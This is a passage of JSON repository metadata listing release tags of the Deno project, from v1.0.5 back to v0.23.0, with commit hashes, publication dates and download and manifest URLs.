5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.